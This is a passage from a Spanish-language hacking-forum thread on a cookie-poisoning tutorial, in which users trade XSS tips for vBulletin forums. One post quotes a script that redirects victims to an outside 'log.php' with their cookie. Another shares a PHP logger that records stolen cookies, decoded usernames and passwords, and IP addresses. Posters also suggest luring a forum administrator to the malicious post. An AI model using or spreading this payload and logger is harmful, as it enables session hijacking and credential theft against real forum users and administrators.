Tutorial Cookie Poisoning

Iniciado por SkapperMX, 21 Mayo 2007, 02:27 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas 1 2 3
Acciones del Usuario

yeikos

#10
28 Mayo 2007, 17:13 PM
Cita de: raka en 28 Mayo 2007, 16:47 PM
Me he podido dar cuenta k en muchos foros vBulletin la opcion de HTML esta on,esto supongo k hace k puedas hacer XSS, no?? posteando un tema y atrayendo al admin del foro hasta el o sino tambien puedes escribirle un privado si esta activado el HTML y cuadno lo lea...listo ;) (no se si esta ultima funcione)
Saludos

Cuando esta HTML activado muchas etiquetas, como <script>, quedan inutilizadas para evitar el mal uso de estas...

rakax

#11
28 Mayo 2007, 22:36 PM
En todos los vBulletin k he entrado las etiquetas <script> funcionan bien ya k me he robado mi cookie :D
Saludos
Cuanto mas aprendo mas cuenta me doy de lo ignorante que soy.

www.raka.uni.cc

yeikos

#12
29 Mayo 2007, 00:54 AM
Cita de: raka en 28 Mayo 2007, 22:36 PM
En todos los vBulletin k he entrado las etiquetas <script> funcionan bien ya k me he robado mi cookie :D
Saludos

Quizás en el foro vBulleting donde estuve realizando las pruebas había instalado algún addon para evitar el uso de estas etiquetas...

X_-:XploitX:-_X

#13
29 Mayo 2007, 12:16 PM
 interesante ... muy buen trabajo
si Windows fuera perfecto no existira Linux para serlo

Einsamkeit

#14
6 Julio 2007, 00:45 AM
Recuerdas la vulnerabilidad XSS??? de ese ataque muy conocido podemos hacer un script robador de cookie bueno veamos

el script lo cual es el siguiente codigo

Código:

<script>self.location.href='http://misitio.com/log.php?c='+escape(document.cookie);</script>

disculpa pero en donde escribes el script?   ( soy novato, pero me intereso este truco)   y que es PHP?
"siehst du mich im licht"

yeikos

#15
6 Julio 2007, 12:36 PM
Busca en Google información relacionada con HTML, javascript y PHP.

Grave

#16
19 Julio 2007, 20:44 PM
Alquien podras explicar detenidamente este codigo se entiende un poco a simple vista pero algunas cosas no las entiendo...

Citar<?php
$archivo = fopen('log2.htm','a');//Aqui podemos cambiar el nombre del archivo a crear
$cookie = $_GET['c'];
$usuario = $_GET['id'];
$ip = getenv ('REMOTE_ADDR');
$re = $HTTPREFERRER;

$fecha=date("j F, Y, g:i a");
fwrite($archivo, '<hr>USUARIO Y PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br>

IP: ' .$ip. '<br> Fecha y Hora: ' .$fecha. '</hr>');
fclose($archivo);
?>
"y el conocimiento os hara libres"

Module Console1
   Console.Write("Hello Word")
   Console.ReadLine()
End Module
http://aion.cr0n0triger.operaunite.com/

yeikos

#17
19 Julio 2007, 23:11 PM
Cita de: Grave en 19 Julio 2007, 20:44 PM
Alquien podras explicar detenidamente este codigo se entiende un poco a simple vista pero algunas cosas no las entiendo...

http://www.google.es/search?hl=es&q=fopen+php&btnG=Buscar&meta=lr%3Dlang_es

Dark_Knight

#18
1 Agosto 2007, 22:57 PM
hola

tengoun problema...

cuando coloco <script>alert(5);</script>

no me aparece el mensaje... sino que me aparece el post con el codigo escrito

en donde se debe colocar el codigo... y/o que se tiene que hacer para que aparezca el mensaje...

espero su respuesta

gracias  ;D
El hombre no puede crear nada sin antes dar algo a cambio... para crear... algo del mismo valor debe perderse.... esa es la ley de la equivalencia de intercambio... y el que desafie esa ley se convertira en un desafio de las creencias del ser humano y de la existencia de dios....

yeikos

#19
1 Agosto 2007, 23:17 PM
Eso es por que la variable filtra los caracteres especiales, como pueden ser > o <, mostrado como resultado en tu caso &lt;script&gt;alert(5);&lt;/script&gt;.

Examina el código fuente de la página web en busca del código que introdujiste...
Imprimir
Ir Arriba Páginas 1 2 3
Acciones del Usuario